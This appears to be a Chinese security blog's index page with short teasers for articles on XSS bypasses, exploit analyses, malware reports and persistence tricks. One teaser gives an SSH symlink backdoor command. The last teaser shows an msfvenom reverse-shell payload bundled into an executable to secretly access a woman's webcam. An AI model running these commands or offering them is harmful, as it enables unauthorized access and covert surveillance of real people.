登陆 注册
  • 利用 URN 绕过 URL 检查

    桑云信息Lzers桑云信息Lzers 2021-08-23

    0x00 前言最近痴迷于看 RFC 及各类规范文档,从中发现一些有趣的利用。刚好前段时间发现了一处有趣的特性,成功绕过了某个知名站点的 XSS 防御,最终执行 XSS 攻击。本来以为只是一个小 trick,后来被某偶像拿来出了道 CTF 题目,觉得有必要分享一下。0x01 一个真实 case 及其绕过几个月前发现某网站上有类似于下面的逻辑,会从 URL 中取...

  • ​Cisco Cook常用方法与技巧

    桑云信息Lzers桑云信息Lzers 2021-08-21

    一、介绍1.Cisco近几年的安全漏洞:Cisco近几年披露了诸多的安全漏洞。The Holy Grail Cisco IOS Shellcode And Exploitaion Techniques---Michael Lynn:披露如何绕过Cisco堆检查;GeekPwn大会上的相关内容;以及众多主要的漏洞:IKEv2 Exploit(cve-2016-...

  • SSH软链接后门利用和原理

    本文由锦行科技的安全研究团队提供,主要介绍SSH软连接后门的利用和相关原理。00 利用前提ssh配置中开启了PAM进行身份验证查看是否使用PAM进行身份验证:cat/etc/ssh/sshd_config|grep UsePAM01 建立后门建立软连接后门:ln-sf/usr/sbin/sshd/tmp/su;/tmp/su-oPort=1234注意:软链接...

  • TokenPocket 钱包二维码盗 usdt 安全事件分析[含附件]

    桑云信息Lzers桑云信息Lzers 2021-08-14

    一、事件概要昨日,随着微博大v @夏雪宜BTC 的曝光,一种币圈新型骗局进入大家的视线,一时间币圈人人自危:大概是:只要你通过二维码给骗子转过一次 usdt,之后你账户的 usdt 就会被骗子转光。看起来非常正常的二维码交易,为什么骗子在转账一次之后就能控制用户的钱包呢?下面对犯罪手法做简要分析。二、过程分析扫描这个二维码:会访问以下链接...

  • weblogic Coherence 组件漏洞总结分析

    AlisAlis 2021-08-13

    前言Coherence 组件是 WebLogic 中的一个核心组件,内置在 WebLogic 中。关于 Coherence 组件的官方介绍:https://www.oracle.com/cn/java/coherence/ 本文涉及的漏洞有:CVE-2021-2135 ,CVE-2021-2394,CVE-2020-2555,CVE-2020-2883,CV...

  • 如何检测暗链植入

    桑云信息安云桑云信息安云 2021-08-12

    工作来源Usenix Security 2021工作背景在合法网站植入暗链推广非法商品/服务(如毒品、色情、赌博等)是很常见的,黑帽 SEO 是其中一个主要的途径。搜索引擎为此付出了巨大的努力,Google 每年针对黑帽 SEO 会更新排名算法超过 500 次。SEO 旨在提高网站、*搜索引擎的检索排名,而黑帽 SEO 通常通过植入暗链的方式提高排...

  • 攻击技术研判-攻击者结合NDay投递VBA恶意远控分析

    桑云信息安云桑云信息安云 2021-08-12

    情报背景Malwarebytes的研究人员发现有攻击者在近期的攻击活动中使用CVE-2021-26411部署了功能齐全的VBA RAT,本文对其中包含的攻击技术进行了分析研判。战术标签网络钓鱼技术标签Marco情报来源https://blog.malwarebytes.com/threat-intelligence/2021/07/crimea-manife...

  • 干货 | 巧用cpl文件维持权限和免杀

    shaqianshaqian 2021-08-12

    前言最近无意间发现了cpl文件,之前对该类型的文件了解几乎为零,由于触及到我的知识盲区,于是决定探究。cpl文件CPL文件,是Windows控制面板扩展项,CPL全拼为Control Panel Item 在system32目录下有一系列的cpl文件,分别对应着各种控制面板的子选项列入我们win+R输入main.cpl将会打开控制面板中的鼠标属性c...

  • LuminousMoth样本分析报告

    桑云信息Lzers桑云信息Lzers 2021-07-27

    前言2021年7月,卡巴斯基发现一种针对东南亚的攻击活动,被称作LuminoutMoth。该活动至少可以追溯到2020年10月,早期的攻击大多在缅甸但现在主要在菲律宾,目前发现缅甸共有100多名受害者,菲律宾有1,400名受害者,其中一些受害者是政府实体。源头APT组织向受害者发送包含Dropbox下载链接的钓鱼邮件,通过将file_subpath参数设置为...

  • 一次渗透妹子电脑开摄像头全过程

    桑云信息安云桑云信息安云 2021-07-27

    具体思路第一步构建恶意文件1.指定一个可执行程序 捆绑木马msfvenom -p windows/x64/meterpreter_reverse_tcp -e x64/zutto_dekiru LHOST=[IP] LPORT=3333 -x webshell.exe ...

请关注微信公众号
微信二维码
不容错过
Powered By SangYun.Net